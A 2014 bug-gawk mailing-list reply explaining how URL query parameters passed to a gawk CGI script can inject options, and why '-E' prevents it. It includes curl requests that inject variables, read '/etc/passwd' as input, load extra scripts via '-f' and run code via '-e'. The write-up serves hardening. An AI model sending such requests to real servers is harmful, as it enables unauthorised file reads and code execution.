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Re: [bug-gawk] Question regarding security of gawk CGI scripts

From: Assaf Gordon
Subject: Re: [bug-gawk] Question regarding security of gawk CGI scripts
Date: Thu, 20 Nov 2014 14:27:34 -0500
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Hello Tomer and all,

On 06/11/2014 04:23 PM, taltman wrote:
In the GAWK manual, there's the following discussion of CGI security:

"This option is particularly necessary for World Wide Web CGI
applications that pass arguments through the URL; using this option
prevents a malicious (or other) user from passing in options,
assignments, or awk source code (via --source) to the CGI application."

I can try to suggest few examples of gawk and CGI.

The setup:

A AWK CGI script, named "/home/gordon/awktest/1.cgi" :
#!/usr/bin/gawk -f
    print "Content-type: text/plain";
    print "";
    print "Hello from AWK/CGI"
    print "FS = '" FS "'"
    print "OFS = '" OFS "'"
    print "myvar = '" myvar "'"
{ print ; }

A AWK regular script, named "/home/gordon/awktest/foo.awk":
BEGIN { print "hello from other awk" }

Apache configuration as follows:
Alias /awktest /home/gordon/awktest
<Directory /home/gordon/awktest>
    Options +ExecCGI
    AllowOverride None
    Require all granted
    AddHandler cgi-script .cgi

Now, examples:

If you just visit the AWK/CGI script URL without any CGI parameters, it will 
run as expected,

    $ curl http://localhost/awktest/2.cgi
    Hello from AWK/CGI
    FS = ' '
    OFS = ' '
    myvar = ''

Apache will give the CGI parameters to AWK, so you can indirectly set AWK 

    $ curl 'http://localhost/awktest/2.cgi?-vFS%3Dfoo'
    Hello from AWK/CGI
    FS = 'foo'
    OFS = ' '
    myvar = ''

The above is equivalent to:

    awk -vFS=foo /home/gordon/awktest/2.cgi

In the same way I can affect your awk's script variables:

   $ curl 'http://localhost/awktest/2.cgi?-vmyvar%3Dfoobar'
   Hello from AWK/CGI
   FS = ' '
   OFS = ' '
   myvar = 'foobar'

So if you left them uninitialized, assuming the default values in AWK are empty 
string or zero,
this could cause troubles.


In my contrived example, there's a simple "{print}" command, and in the URL I 
can affect awk's input file:

    $ curl 'http://localhost/awktest/2.cgi?/etc/passwd'
    Hello from AWK/CGI
    FS =  ' '
    OFS = ' '
    myvar = ''


Using "-f" I can specify more AWK script to run:

    $ curl 'http://localhost/awktest/2.cgi?-f/home/gordon/awktest/foo.awk'
    Hello from AWK/CGI
    FS = ' '
    OFS = ' '
    myvar = ''
    hello from other awk

Which is equivalent to:

    awk -f foo.awk -f 2.cgi


And perhaps, depending on the web server, one can even construct a malicious "-e 
PROGRAM" to run arbitrary AWK commands.
Though I personally haven't investigated it, at least the following does work (i.e. AWK 
doesn't stop and complain, and "1" is a valid awk statement):

    $ curl 'http://localhost/awktest/2.cgi?-e1'
    Hello from AWK/CGI
    FS = ' '
    OFS = ' '
    myvar = ''

More complicated commands might be blocked by the web-server's 
character-escaping rules.


All these issues are prevented by switching from "-f" to "-E" - because "-E" 
tells AWK to immediately stop command-line processing.

Hope this helps.

 - Assaf

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